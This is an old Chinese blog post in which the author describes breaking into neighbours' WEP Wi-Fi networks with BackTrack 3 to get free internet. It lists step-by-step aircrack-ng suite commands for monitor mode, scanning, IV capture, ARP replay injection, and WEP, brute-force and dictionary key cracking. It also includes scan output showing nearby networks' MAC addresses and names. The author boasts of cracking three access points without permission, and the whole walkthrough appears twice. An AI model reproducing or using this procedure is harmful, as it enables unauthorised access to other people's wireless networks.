上一篇
下一篇
BT3心得(BT3.....)
作者:无言 日期:2010-03-10
郁闷~~~,目前住的地方没有小区宽带,要装电信网络还要装固话.......~~~
强烈BS一下电信这种捆绑销售~
无奈用WiFiHopper扫了一下周围的无线信号,6、7个AP。不过信号强度都很一般,很多还是WPA2的...
Windows 下的扫描工具推荐用WiFiHopper,基本上目前的无线网卡都支持,比NetworkStumbler 好用...
找了个U盘,做个BT3启动盘....本人用的是rockplay的霸天虎BT3.6.1(主要因为T61用的是4965,目前看,这个BT3版本支持的最好...)扫了一下,又多发现了几个AP,嘿嘿~~还有几个WEP的...看来蹭网有戏了........
加载命令:
modprobe -r iwl3945 (卸载默认挂载的3945驱动)
modprobe ipwraw (加载可监听的网卡驱动)
modinfo ipwraw (查看所加载驱动模块的版本信息)
加载接口:
airmon-ng start wlan0 (加载网卡,激活监听模式,扫描可被加载的mon接口)
airmon-ng start wlan0 11 (SK )
可通过ifcofig -a 查看一无线网卡的接口信息
全频搜索:
airodump-ng mon0 (基于mon0的全信道扫描,可以查到附近的AP信息,信号强度,加密方式....)
实例:
------------------------------------------------------------------
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:3A:35:0C:47:30 -1 0 1 0 133 -1 OPN <length: 0>
00:23:CD:70:FB:96 -81 1037 0 0 6 54 . WPA2 CCMP PSK TP-LINK_70FB94
00:27:19:97:76:B6 -83 792 27 0 6 54 . WPA2 CCMP PSK FAST_9776B6
C8:3A:35:0B:96:D0 -83 558 0 0 6 54 WPA TKIP PSK Tenda
94:0C:6D:21:39:BA -85 560 0 0 6 54 . WPA2 CCMP PSK zhouzi
00:19:E0:B8:35:BA -86 388 0 0 6 54 . WEP WEP SKA nrs
00:19:E0:39:0B:72 -87 244 100 0 6 54 . WEP WEP TP-LINK
00:21:27:35:E4:CC -87 140 59 0 6 54 . WEP WEP wangxq
------------------------------------------------------------------
基于信道6的 mon0 接口 扫描:
airodump-ng -c 6 mon0 (只基于信道6的扫描,很多AP默认都是用的信道6..能找到不少..)
基于信道11的 mon0 接口 扫描:
airodump-ng -c 11 mon0 (只基于信道11的扫描)
基于mon0 接口的信道6扫描,并且保存为phok-01.ivs
airodump-ng --ivs -w phok-01.ivs -c 6 mon0
开始抓包,并且保存成ivs文件,ivs是最后用于破解的文件,ivs状态在抓包过程中,可以通过data值项看到,一般用于WEP破解时最好在15000ivs以上~,试了很多次,这是必须的,否则无法破解.....
目前BT3在破解WPA加密方式的还不够强悍...所以能搜到WEP,优先进行...
口令破解:
aircrack-ng -n 64 -b<apmac> phok-01.ivs (WEP的口令破解...)
参数说明:
[-n]:设置WEP KEY 长度(64/128/152/256/512)
aircrack-ng -x -f 2 phok-01.cap
[-x]:设置为暴力破解模式
[-f]:设置复杂程度,wep密码设置为1,wpa 密码设置为2
aircrack-ng -w password.txt phok-01.cap
[-w]:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包文件。
嘿嘿~~ 经过上述努力,破解了3个WEP的AP,抓包时间长达2个多小时,不过还是蹭上网了..回头抽时间再研究一下,通过冲突模式重新连接所产生的握手数据来增加data值.....
aireplay-ng -3 -b <ap mac> -h <合法客户端mac> mon0
搞的时候懒得截图了,这图是从网上搜的,它用的是GUI模式,其实用命令行方式是最方便的...
强烈BS一下电信这种捆绑销售~
无奈用WiFiHopper扫了一下周围的无线信号,6、7个AP。不过信号强度都很一般,很多还是WPA2的...
Windows 下的扫描工具推荐用WiFiHopper,基本上目前的无线网卡都支持,比NetworkStumbler 好用...
找了个U盘,做个BT3启动盘....本人用的是rockplay的霸天虎BT3.6.1(主要因为T61用的是4965,目前看,这个BT3版本支持的最好...)扫了一下,又多发现了几个AP,嘿嘿~~还有几个WEP的...看来蹭网有戏了........
加载命令:
modprobe -r iwl3945 (卸载默认挂载的3945驱动)
modprobe ipwraw (加载可监听的网卡驱动)
modinfo ipwraw (查看所加载驱动模块的版本信息)
加载接口:
airmon-ng start wlan0 (加载网卡,激活监听模式,扫描可被加载的mon接口)
airmon-ng start wlan0 11 (SK )
可通过ifcofig -a 查看一无线网卡的接口信息
全频搜索:
airodump-ng mon0 (基于mon0的全信道扫描,可以查到附近的AP信息,信号强度,加密方式....)
实例:
------------------------------------------------------------------
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:3A:35:0C:47:30 -1 0 1 0 133 -1 OPN <length: 0>
00:23:CD:70:FB:96 -81 1037 0 0 6 54 . WPA2 CCMP PSK TP-LINK_70FB94
00:27:19:97:76:B6 -83 792 27 0 6 54 . WPA2 CCMP PSK FAST_9776B6
C8:3A:35:0B:96:D0 -83 558 0 0 6 54 WPA TKIP PSK Tenda
94:0C:6D:21:39:BA -85 560 0 0 6 54 . WPA2 CCMP PSK zhouzi
00:19:E0:B8:35:BA -86 388 0 0 6 54 . WEP WEP SKA nrs
00:19:E0:39:0B:72 -87 244 100 0 6 54 . WEP WEP TP-LINK
00:21:27:35:E4:CC -87 140 59 0 6 54 . WEP WEP wangxq
------------------------------------------------------------------
基于信道6的 mon0 接口 扫描:
airodump-ng -c 6 mon0 (只基于信道6的扫描,很多AP默认都是用的信道6..能找到不少..)
基于信道11的 mon0 接口 扫描:
airodump-ng -c 11 mon0 (只基于信道11的扫描)
基于mon0 接口的信道6扫描,并且保存为phok-01.ivs
airodump-ng --ivs -w phok-01.ivs -c 6 mon0
开始抓包,并且保存成ivs文件,ivs是最后用于破解的文件,ivs状态在抓包过程中,可以通过data值项看到,一般用于WEP破解时最好在15000ivs以上~,试了很多次,这是必须的,否则无法破解.....
目前BT3在破解WPA加密方式的还不够强悍...所以能搜到WEP,优先进行...
口令破解:
aircrack-ng -n 64 -b<apmac> phok-01.ivs (WEP的口令破解...)
参数说明:
[-n]:设置WEP KEY 长度(64/128/152/256/512)
aircrack-ng -x -f 2 phok-01.cap
[-x]:设置为暴力破解模式
[-f]:设置复杂程度,wep密码设置为1,wpa 密码设置为2
aircrack-ng -w password.txt phok-01.cap
[-w]:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包文件。
嘿嘿~~ 经过上述努力,破解了3个WEP的AP,抓包时间长达2个多小时,不过还是蹭上网了..回头抽时间再研究一下,通过冲突模式重新连接所产生的握手数据来增加data值.....
aireplay-ng -3 -b <ap mac> -h <合法客户端mac> mon0
搞的时候懒得截图了,这图是从网上搜的,它用的是GUI模式,其实用命令行方式是最方便的...
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: 0 | 查看次数: 993
发表评论
你没有权限发表评论!
